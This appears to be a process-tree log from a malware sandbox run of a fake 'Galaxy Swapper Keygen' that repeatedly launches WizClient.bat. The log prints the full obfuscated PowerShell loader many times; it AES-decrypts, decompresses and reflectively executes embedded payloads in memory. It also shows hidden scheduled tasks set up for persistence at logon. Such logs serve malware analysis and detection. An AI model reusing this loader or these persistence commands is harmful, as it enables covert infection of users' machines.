C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
29⤵
- Command and Scripting Interpreter: PowerShell
PID:7380

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
28⤵
PID:2596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
29⤵
PID:2632

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
29⤵
PID:4928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
30⤵
PID:2668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
31⤵
PID:7828

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
31⤵
- Command and Scripting Interpreter: PowerShell
PID:7968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_243_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_243.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
32⤵
- Command and Scripting Interpreter: PowerShell
PID:10572

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
30⤵
PID:420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
31⤵
PID:2708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
32⤵
PID:7684

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
32⤵
PID:7692

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
31⤵
PID:4068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
32⤵
PID:1372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
33⤵
PID:7600

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
33⤵
PID:7840

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
32⤵
PID:2308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
33⤵
PID:752

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
33⤵
PID:4396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
34⤵
PID:3908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
35⤵
PID:1480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
35⤵
- Command and Scripting Interpreter: PowerShell
PID:1072

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_865_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_865.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
36⤵
- Command and Scripting Interpreter: PowerShell
PID:7440

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_865.vbs"
36⤵
PID:900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_865.bat" "
37⤵
PID:7584

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
34⤵
PID:2012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
35⤵
PID:2432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
36⤵
PID:9172

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
36⤵
- Command and Scripting Interpreter: PowerShell
PID:8880

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_14_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_14.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
37⤵
- Command and Scripting Interpreter: PowerShell
PID:9856

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_14.vbs"
37⤵
PID:4036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_14.bat" "
38⤵
PID:3496

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
35⤵
PID:4360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
36⤵
PID:4512

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
36⤵
PID:1536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
37⤵
PID:2100

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
37⤵
PID:3520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
38⤵
PID:1016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
39⤵
PID:8712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
39⤵
PID:8924

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
38⤵
PID:2196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
39⤵
PID:3476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
40⤵
PID:9424

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
40⤵
PID:9444

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
39⤵
PID:4480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
40⤵
PID:1088

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
41⤵
PID:5028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
41⤵
PID:7720

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
41⤵
- Command and Scripting Interpreter: PowerShell
PID:7508

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_509_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_509.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
42⤵
- Command and Scripting Interpreter: PowerShell
PID:10156

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_509.vbs"
42⤵
PID:9088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_509.bat" "
43⤵
PID:9860

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
40⤵
PID:1736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
41⤵
PID:4788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
42⤵
PID:6312

